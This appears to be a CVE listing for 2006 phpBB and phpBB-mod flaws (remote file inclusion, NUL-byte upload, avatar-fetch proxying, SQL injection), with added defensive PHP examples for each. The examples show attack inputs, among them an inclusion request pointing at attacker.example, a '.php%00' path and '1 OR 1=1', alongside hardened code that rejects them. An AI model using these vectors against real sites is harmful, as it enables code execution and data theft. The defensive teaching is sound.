CVE-2006-4893
https://notcve.org/view.php?id=CVE-2006-4893
PHP remote file inclusion vulnerability in bb_usage_stats/includes/bb_usage_stats.php in phpBB XS 0.58 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter, a different vector than CVE-2006-4780.
• http://nyubicrew.org/adv/Noge_adv_02.txt http://secunia.com/advisories/21970 http://securityreason.com/securityalert/1617 http://www.osvdb.org/28918 http://www.securityfocus.com/archive/1/446108/100/0/threaded http://www.securityfocus.com/archive/1/452469/100/200/threaded http://www.securityfocus.com/bid/20046 http://www.vupen.com/english/advisories/2006/3654
CVE-2006-4779 – Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion
https://notcve.org/view.php?id=CVE-2006-4779
PHP remote file inclusion vulnerability in includes/functions_portal.php in Vitrax Premodded phpBB 1.0.6-R3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
• https://www.exploit-db.com/exploits/2353 http://secunia.com/advisories/21882 http://www.securityfocus.com/bid/19979 http://www.vupen.com/english/advisories/2006/3571 https://exchange.xforce.ibmcloud.com/vulnerabilities/28889
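Both CVE-2006-4893 and CVE-2006-4779 share one mechanism: a mod file that is reachable by URL builds an include path from $phpbb_root_path without ever assigning it, so under register_globals the query string supplies it. The following is an added illustration, not the phpBB XS or Vitrax code (the page shows neither); the include line, the directory layout and the function names are assumptions, and the guard pattern shown is the one phpBB 2 itself uses in its include files.

```php
<?php
// Added illustration of the phpbb_root_path remote file inclusion pattern.
// Not the Vitrax or phpBB XS code; file layout and helper names are assumed.

// ---------- vulnerable shape (reconstruction, not the mod's actual line) ----------
// includes/functions_portal.php is requested directly, register_globals=On (the
// PHP 4/5 default for years) and allow_url_fopen/allow_url_include permit remote
// streams. Nothing sets $phpbb_root_path before the include, so the request does:
//
//   GET /includes/functions_portal.php?phpbb_root_path=http://attacker.example/
//
//   include($phpbb_root_path . 'includes/functions.php');
//   // => include('http://attacker.example/includes/functions.php')  -> remote PHP runs
//
// ---------- hardened shape ----------
// 1. Include-only files refuse direct requests. phpBB 2's own first lines are:
//      if (!defined('IN_PHPBB')) { die('Hacking attempt'); }
//    (kept as a comment here so this file stays runnable on its own).

// 2. The include base is derived from the file's own location, never from the request.
function board_root(): string
{
    return realpath(__DIR__) . DIRECTORY_SEPARATOR;
}

// 3. Even with a trusted base, the relative part is validated before include.
function safe_include(string $root, string $relative): void
{
    // Reject stream wrappers (http://, ftp://, php://, data:), traversal and NUL.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)
        || strpos($relative, '..') !== false
        || strpos($relative, "\0") !== false) {
        throw new RuntimeException("refusing include of '$relative'");
    }
    $base   = realpath($root);
    $target = realpath($root . $relative);
    // realpath() returns false for missing files and for wrappers; the prefix
    // check also catches symlinks that resolve outside the root.
    if ($base === false || $target === false
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("'$relative' is not under the board root");
    }
    include $target;
}

// Self-contained demo: a throwaway board root in the temp dir with one local include.
function demo(): array
{
    $root = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
    mkdir($root . '/includes', 0700, true);
    file_put_contents($root . '/includes/functions.php',
        "<?php\nfunction portal_ok() { return 'included local file'; }\n");

    $results = [];
    $attempts = [
        'http://attacker.example/includes/functions.php', // the CVE's vector
        '../../etc/passwd',                               // traversal
        'includes/functions.php',                         // legitimate
    ];
    foreach ($attempts as $rel) {
        try {
            safe_include($root . '/', $rel);
            $results[$rel] = portal_ok();
        } catch (RuntimeException $e) {
            $results[$rel] = 'rejected: ' . $e->getMessage();
        }
    }
    unlink($root . '/includes/functions.php');
    rmdir($root . '/includes');
    rmdir($root);
    return $results;
}

print_r(demo());
```

Entry-point scripts set the base themselves, the way phpBB 2's index.php does with `define('IN_PHPBB', true); $phpbb_root_path = './';` before any include, and never read $phpbb_root_path from the request. Turning off register_globals and allow_url_include removes the two preconditions at the interpreter level, but the include guard is what protects a board whose hosting you do not control.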
CVE-2006-4758
https://notcve.org/view.php?id=CVE-2006-4758
phpBB 2.0.21 does not properly handle pathnames ending in %00, which allows remote authenticated administrative users to upload arbitrary files, as demonstrated by a query to admin/admin_board.php with an avatar_path parameter ending in .php%00.
• http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=388120 http://secunia.com/advisories/22188 http://secunia.com/advisories/28871 http://www.debian.org/security/2008/dsa-1488 http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=489624 http://www.security.nnov.ru/Odocument221.html http://www.securityfocus.com/archive/1/445788/100/0/threaded http://www.securityfocus.com/bid/20347 http://www.securityfocus.com/bid/21806 https://exchange.xforce.ibmcloud.com/vulnerabilities/28884
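The %00 trick works because PHP decodes it to a NUL byte that string-level checks carry along but the C filesystem calls underneath (in PHP before 5.3.4) treat as the end of the path, so a value such as `x.php%00` looks like one thing to a suffix test and another to the file that actually gets written. The block below is an added example, not phpBB's admin_board.php or its avatar upload code: it shows the truncation and one way to validate a storage-directory setting and an uploaded file name so that a NUL byte can never reach a filesystem call. The function names and the directory layout are assumptions.

```php
<?php
// Added illustration of NUL-byte path truncation and a validation routine.
// Not phpBB's own code; helper names and the images/avatars layout are assumed.

function demonstrate_truncation(): array
{
    // PHP decodes %00 in the query string to a real NUL byte before the script
    // sees $_GET['avatar_path']; urldecode() reproduces that here.
    $decoded = urldecode('images/avatars/x.php%00');
    return [
        'php_sees'      => addcslashes($decoded, "\0"),      // images/avatars/x.php\0
        'strlen'        => strlen($decoded),                 // 21: the NUL is part of the string
        'filesystem_sees' => strstr($decoded, "\0", true),   // images/avatars/x.php (old PHP)
    ];
}

function validate_storage_dir(string $setting, string $root): string
{
    // 1. No control bytes anywhere, NUL included; this is the check that matters.
    if (preg_match('/[\x00-\x1f\x7f]/', $setting)) {
        throw new InvalidArgumentException('control byte in path');
    }
    // 2. A conservative character set for a relative directory, no traversal.
    if (!preg_match('#^[A-Za-z0-9_./-]+$#', $setting) || strpos($setting, '..') !== false) {
        throw new InvalidArgumentException('unexpected characters in path');
    }
    // 3. Must resolve to an existing directory under the board root (symlinks included).
    $base = realpath($root);
    $dir  = realpath($root . '/' . $setting);
    if ($base === false || $dir === false || !is_dir($dir)
        || strncmp($dir . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new InvalidArgumentException('not a directory under the board root');
    }
    return $dir;
}

function safe_avatar_name(string $client_name): string
{
    // Never store under the client's name: pick the extension from an allowlist
    // and generate the stored name, so "evil.php\0.gif" cannot become evil.php.
    $ext = strtolower(pathinfo(str_replace("\0", '', $client_name), PATHINFO_EXTENSION));
    if (!in_array($ext, ['gif', 'jpg', 'jpeg', 'png'], true)) {
        throw new InvalidArgumentException('unsupported image extension');
    }
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

function demo(): array
{
    $root = sys_get_temp_dir() . '/nul_demo_' . getmypid();
    mkdir($root . '/images/avatars', 0700, true);

    $out = ['truncation' => demonstrate_truncation()];
    $settings = [
        'images/avatars',          // legitimate
        "images/avatars/x.php\0",  // the CVE's vector, already decoded
        '../../tmp',               // traversal
    ];
    foreach ($settings as $s) {
        try {
            $out[addcslashes($s, "\0")] = validate_storage_dir($s, $root);
        } catch (InvalidArgumentException $e) {
            $out[addcslashes($s, "\0")] = 'rejected: ' . $e->getMessage();
        }
    }
    $out['stored_name'] = safe_avatar_name("evil.php\0.gif");

    rmdir($root . '/images/avatars');
    rmdir($root . '/images');
    rmdir($root);
    return $out;
}

print_r(demo());
```

Since PHP 5.3.4 the filesystem functions themselves refuse paths containing NUL (PHP 8 throws a ValueError), which closes this particular truncation, but the same two-view problem recurs with any check done on a string and then acted on by a different layer; checking for control bytes first, then comparing the realpath() result against the intended root, does not depend on the interpreter version.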
CVE-2006-4450 – phpBB 2.0.20 - Unauthorized HTTP Proxy
https://notcve.org/view.php?id=CVE-2006-4450
usercp_avatar.php in PHPBB 2.0.20, when avatar uploading is enabled, allows remote attackers to use the server as a web proxy by submitting a URL to the avatarurl parameter, which is then used in an HTTP GET request.
• https://www.exploit-db.com/exploits/27863 http://archives.neohapsis.com/archives/bugtraq/2006-05/0238.html http://secunia.com/advisories/20093 http://securityreason.com/securityalert/1470 http://www.securityfocus.com/bid/17965 https://exchange.xforce.ibmcloud.com/vulnerabilities/26537
```
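Fetching an avatar from a user-supplied URL is a server-side request made on the user's behalf; without restrictions on scheme, destination address and response, the board becomes an open proxy and a way to reach hosts that only the server can see. The following is an added example, not phpBB's usercp_avatar.php: it shows a fetch routine that limits the request to public HTTP(S) hosts, pins the connection to the address that was checked, refuses redirects, caps the size and verifies the bytes are an image. The limits and helper names are assumptions.

```php
<?php
// Added illustration of a constrained remote avatar fetch (cURL extension).
// Not phpBB's code; AVATAR_MAX_BYTES and the function names are assumed.

const AVATAR_MAX_BYTES = 50 * 1024;
const AVATAR_TYPES     = ['image/gif', 'image/jpeg', 'image/png'];

function resolve_public_ip(string $host): string
{
    // gethostbyname() returns the name unchanged when resolution fails.
    $ip = gethostbyname($host);
    if (!filter_var($ip, FILTER_VALIDATE_IP)) {
        throw new RuntimeException("cannot resolve $host");
    }
    // Refuse loopback, RFC 1918, link-local and reserved ranges, so the board
    // cannot be pointed at 127.0.0.1, 169.254.169.254 or intranet hosts.
    if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        throw new RuntimeException("refusing to fetch from $ip");
    }
    return $ip;
}

function fetch_remote_avatar(string $url): string
{
    $parts = parse_url($url);
    $scheme = $parts['scheme'] ?? '';
    if ($parts === false || empty($parts['host']) || !in_array($scheme, ['http', 'https'], true)) {
        throw new RuntimeException('only http(s) URLs with a host are accepted');
    }
    $ip   = resolve_public_ip($parts['host']);
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,  // a 302 to http://127.0.0.1/ must not be followed
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => AVATAR_MAX_BYTES,
        // Connect to the address that was vetted, so a DNS answer that changes
        // between our lookup and curl's (rebinding) cannot redirect the request.
        CURLOPT_RESOLVE        => ["{$parts['host']}:$port:$ip"],
    ]);
    $body = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);

    if ($body === false || $code !== 200 || strlen($body) > AVATAR_MAX_BYTES) {
        throw new RuntimeException('fetch failed, non-200 status, or response too large');
    }
    // Content-Type is attacker-controlled; check the bytes themselves.
    $info = @getimagesizefromstring($body);
    if ($info === false || !in_array($info['mime'], AVATAR_TYPES, true)) {
        throw new RuntimeException('response is not an allowed image type');
    }
    return $body;
}

// Offline demo: every one of these is refused before any connection is opened.
function demo(): array
{
    $out = [];
    foreach (['ftp://files.example/a.gif', 'http://127.0.0.1/admin/', 'http://10.0.0.5/x.png', 'http://[::1]/a.gif'] as $u) {
        try {
            fetch_remote_avatar($u);
            $out[$u] = 'fetched';
        } catch (RuntimeException $e) {
            $out[$u] = 'rejected: ' . $e->getMessage();
        }
    }
    return $out;
}

print_r(demo());
```

Two caveats for anyone adapting this: gethostbyname() only returns IPv4 answers, so a deployment with IPv6 egress needs the same range check on AAAA records (dns_get_record()) or should drop IPv6 entirely, as this version does by rejecting bracketed literals; and an "image" that is also valid PHP or JavaScript is still a problem if it is later served from a path the application executes or the browser sniffs, which is a separate check on where and how the file is stored.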
CVE-2006-3940 – phpBB-Auction 1.x - 'auction_store.php?u' SQL Injection
https://notcve.org/view.php?id=CVE-2006-3940
Multiple SQL injection vulnerabilities in phpbb-Auction allow remote attackers to execute arbitrary SQL commands via (1) the ar parameter in auction_room.php and (2) the u parameter in auction_store.php. NOTE: the auction_rating.php vector is already covered by CVE-2005-1234. NOTE: the original disclosure states that the product name is "PHP-Auction", but this is probably an error.
• https://www.exploit-db.com/exploits/28282 https://www.exploit-db.com/exploits/28281 http://securityreason.com/securityalert/1306 http://www.aria-security.net/advisory/phpauction.txt http://www.securityfocus.com/archive/1/441190/100/0/threaded http://www.securityfocus.com/bid/19179 https://exchange.xforce.ibmcloud.com/vulnerabilities/28006
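Both vectors (ar in auction_room.php, u in auction_store.php) are numeric identifiers concatenated into SQL text. The block below is an added example, not phpbb-Auction's code: it reconstructs the injectable query shape for the u parameter, then performs the same lookup with the value typed and bound, and runs both against an in-memory SQLite database so the difference is observable. The table, its columns and the helper names are assumptions.

```php
<?php
// Added illustration of the auction_store.php?u= injection and its fix.
// Not phpbb-Auction's code; the auction_items table and column names are assumed.
// Requires the pdo_sqlite extension for the demo.

// ---------- vulnerable: the parameter is pasted into the SQL text ----------
function build_store_query_unsafe(string $u): string
{
    return "SELECT item_id, owner_id, title FROM auction_items WHERE owner_id = " . $u;
}
// build_store_query_unsafe('1 OR 1=1') produces
//   SELECT item_id, owner_id, title FROM auction_items WHERE owner_id = 1 OR 1=1
// and a UNION payload on the same parameter reads any other table.

// ---------- hardened: reject anything that is not an id, then bind it ----------
function store_items(PDO $db, string $u): array
{
    // u is a user id: anything that is not a positive integer is an error,
    // not something to "escape". (phpBB 2 itself reaches the same result for
    // integer parameters with intval().)
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $u)) {
        throw new InvalidArgumentException('u must be a positive integer');
    }
    $stmt = $db->prepare('SELECT item_id, owner_id, title FROM auction_items WHERE owner_id = :u');
    $stmt->bindValue(':u', (int) $u, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function demo(): array
{
    $db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE auction_items (item_id INTEGER PRIMARY KEY, owner_id INTEGER, title TEXT)');
    $db->exec("INSERT INTO auction_items (owner_id, title) VALUES (1, 'lamp'), (2, 'chair'), (2, 'desk')");

    $out = [];
    // The tautology returns every owner's rows through the "owner's own store" query.
    $out['unsafe 1 OR 1=1'] = $db->query(build_store_query_unsafe('1 OR 1=1'))
                                 ->fetchAll(PDO::FETCH_COLUMN, 2);
    // The bound lookup returns only owner 2's rows.
    $out['safe u=2'] = array_column(store_items($db, '2'), 'title');
    // The payload never reaches the SQL parser.
    try {
        store_items($db, '1 OR 1=1');
    } catch (InvalidArgumentException $e) {
        $out['safe 1 OR 1=1'] = 'rejected: ' . $e->getMessage();
    }
    return $out;
}

print_r(demo());
```

With MySQL, create the PDO handle with `PDO::ATTR_EMULATE_PREPARES => false` so the placeholder is sent to the server rather than interpolated client-side; for string parameters the same bind-don't-concatenate rule applies, with the allowlist check replaced by whatever the field's format actually is.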